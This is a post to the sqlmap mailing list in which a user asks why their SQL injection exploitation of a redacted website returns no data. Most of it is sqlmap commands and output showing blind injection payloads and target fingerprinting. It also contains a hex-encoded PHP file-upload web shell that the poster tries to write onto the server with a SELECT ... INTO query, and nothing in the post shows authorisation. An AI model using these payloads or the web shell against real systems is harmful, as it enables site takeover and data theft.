Hello members, need your help to solve this mystery,
my manual assessment against a web application revealed possibility of
sqlinjection vulnerability which has been reconfirmed using Netsparker
automated web application assessment tool.
I then used sqlmap to exploit the sqlinjection flaw to do something
interesting but none of them worked for me, even sqlmap says the parameter
is injectable and infact it actually exploited the issue but unfortunately
with ZERO results.
I tried almost everything from "--current-db, --dbs, --banner", and
everything found to be executed with result value as NONE.
I even tried --sql-shell which gave me an sql-shell> prompt, but whatever
query I tried it gave ZERO result without any error, I did tried some
custom query but that didn't worked because of Stacked query limitation.
I'm positively sure that target parameter is injectable but couldn't make
out why it is not executing and/or giving any response to my query
Please help me in this, Thanks in advance!
I have also posted two of the query which I executed for your reference.
SQLMap query output
************************************************************** First query
**************************************************************
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u
http://www.xxxxxx.com/xxx10.php?cid=1111111 --current-db --no-cast
--time-sec=10 -t xxix-output
sqlmap/1.0-dev-7ba9e75 - automatic SQL injection and database takeover
tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program
[*] starting at 18:54:00
[18:54:00] [INFO] setting file for logging HTTP traffic
[18:54:00] [INFO] resuming back-end DBMS 'mysql'
[18:54:00] [INFO] testing connection to the target URL
[18:54:00] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: cid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cid=1111111 AND 1062=1062
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: cid=1111111 AND SLEEP(10)
---
[18:54:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.11
[18:54:00] [INFO] fetching current database
[18:54:00] [WARNING] running in a single-thread mode. Please consider usage
of option '--threads' for faster data retrieval
[18:54:00] [INFO] retrieved:
[18:54:01] [INFO] heuristics detected web page charset 'ascii'
[18:54:01] [WARNING] time-based comparison needs larger statistical model.
Making a few dummy requests, please wait..
[18:54:07] [WARNING] it is very important not to stress the network
adapter's bandwidth during usage of time-based payloads
[18:54:08] [WARNING] in case of continuous data retrieval problems you are
advised to try a switch '--no-cast' or switch '--hex'
current database: None
[18:54:08] [INFO] fetched data logged to text files under
'/pentest/database/sqlmap/output/www.xxxxxx.com'
[*] shutting down at 18:54:08
************************************************************** Second query
**************************************************************
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u
http://www.xxxxxx.com/xxx10.php?cid=1111111 --time-sec=10 --sql-shell
sqlmap/1.0-dev-7ba9e75 - automatic SQL injection and database takeover
tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program
[*] starting at 18:18:17
[18:18:17] [INFO] resuming back-end DBMS 'mysql'
[18:18:17] [INFO] testing connection to the target URL
[18:18:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: cid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cid=1111111 AND 1062=1062
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: cid=1111111 AND SLEEP(10)
---
[18:18:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.11
[18:18:18] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press
ENTER
sql-shell> user()
[18:18:25] [INFO] fetching SQL query output: 'user()'
[18:18:25] [WARNING] running in a single-thread mode. Please consider usage
of option '--threads' for faster data retrieval
[18:18:25] [INFO] retrieved:
[18:18:25] [INFO] heuristics detected web page charset 'ascii'
[18:18:26] [WARNING] time-based comparison needs larger statistical model.
Making a few dummy requests, please wait..
[18:18:32] [WARNING] it is very important not to stress the network
adapter's bandwidth during usage of time-based payloads
[18:18:33] [WARNING] in case of continuous data retrieval problems you are
advised to try a switch '--no-cast' or switch '--hex'
sql-shell> user() --hex
[18:18:59] [INFO] fetching SQL query output: 'user() --hex'
[18:18:59] [INFO] retrieved:
[18:19:00] [INFO] retrieved:
sql-shell> select
0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
into "/var/www/xxxxxx.com/upload.php"; --hex
[18:19:16] [WARNING] execution of custom SQL queries is only available when
stacked queries are supported
sql-shell> db_name --hex
[18:19:29] [INFO] fetching SQL query output: 'db_name --hex'
[18:19:29] [INFO] retrieved:
[18:19:29] [INFO] retrieved:
sql-shell> x
[18:19:39] [INFO] fetched data logged to text files under
'/pentest/database/sqlmap/output/www.xxxxxx.com'
[*] shutting down at 18:19:39
------------------------------------------------------------------------------
CenturyLink Cloud: The Leader in Enterprise Cloud Services.
Learn Why More Businesses Are Choosing CenturyLink Cloud For
Critical Workloads, Development Environments & Everything In Between.
Get a Quote or Start a Free Trial Today.
http://pubads.g.doubleclick.net/gampad/clk?id=119420431&iu=/4140/ostg.clktrk
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
